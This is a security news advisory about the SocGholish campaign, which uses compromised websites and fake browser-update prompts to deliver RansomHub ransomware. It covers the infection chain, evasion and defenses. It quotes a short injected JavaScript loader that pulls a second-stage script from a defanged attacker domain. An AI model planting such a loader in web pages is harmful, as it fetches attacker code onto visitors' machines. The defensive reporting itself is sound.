RansomHub via SocGholish, compromised sites

Home/BOTNET, Compromised, Exploitation, Internet Security, Ransomware, Security Advisory, Security Update/RansomHub via SocGholish, compromised sites

RansomHub via SocGholish, compromised sites

Threat actors behind SocGholish are now using hacked websites to spread RansomHub ransomware. The attack starts with compromised sites delivering malicious JavaScript to visitors.

RansomHub via SocGholish

SocGholish, a JavaScript-based malware, tricks users by posing as browser updates to deliver malicious files. It spreads through compromised websites, making detection challenging. When users visit these infected sites, they encounter fake browser update prompts.

Trend Micro researchers discovered this evolving threat targeting industries such as healthcare, finance, and manufacturing. The attackers have also enhanced their methods to evade detection and improve ransomware deployment.

The attack now ends with RansomHub ransomware, a rising threat known for strong encryption and evasion tactics.

Once activated, RansomHub encrypts files on local and network drives, demanding cryptocurrency for decryption. Investigators found obfuscated JavaScript injected into legitimate files or HTML content on compromised websites.

How the infection starts

The infection starts with compromised websites that run injected JavaScript to assess the visitor’s browser. The malicious code looks like this:

This harmless-looking code loads more scripts from attacker-controlled domains.

(function(){
var d = document;
var s = d.createElement(‘script’);
s.src = ‘https://compromised-cdn[.]com/updater.js’;
d.getElementsByTagName(‘head’)[0].appendChild(s);
})();

The second-stage JavaScript checks the environment to evade sandbox detection and analysis. It uses browser fingerprinting to identify Chrome, Firefox, or Edge before displaying a fake update notice.

SocGholish flow: Website compromise to payload delivery (Trend Micro)

If users click the fake update, they download a ZIP file with malicious JavaScript. When executed, this file creates persistence through scheduled tasks and registry changes, then downloads the RansomHub payload from command-and-control servers.

The ransomware uses advanced techniques like process hollowing and API unhooking to bypass security tools. The attack ends with file encryption and a ransom note demanding payment.

To defend against this threat, experts recommend using strong web filtering, keeping browsers updated, and training users to spot fake update alerts.

‍Follow Us on: Twitter, InstagramFacebook to get the latest security news!

Post Views: 153
By | 2025-03-18T06:45:29+05:30 March 17th, 2025|BOTNET, Compromised, Exploitation, Internet Security, Ransomware, Security Advisory, Security Update|

About the Author:

FirstHackersNews- Identifies Security

Related Posts

Leave A Comment

Subscribe to our newsletter to receive security tips everday!